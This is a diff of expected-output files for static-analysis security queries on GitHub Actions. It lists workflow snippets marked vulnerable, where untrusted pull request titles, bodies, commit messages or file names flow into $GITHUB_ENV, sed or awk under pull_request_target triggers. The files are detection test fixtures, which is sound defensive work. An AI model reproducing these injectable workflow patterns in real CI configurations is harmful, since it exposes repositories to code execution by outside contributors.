| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082f..281fd39552a 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index bd0684d1711..5eddb791ae5 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
@@ -21,15 +21,15 @@ nodes | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4a2950d84ae..dad99f0029a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -613,154 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | 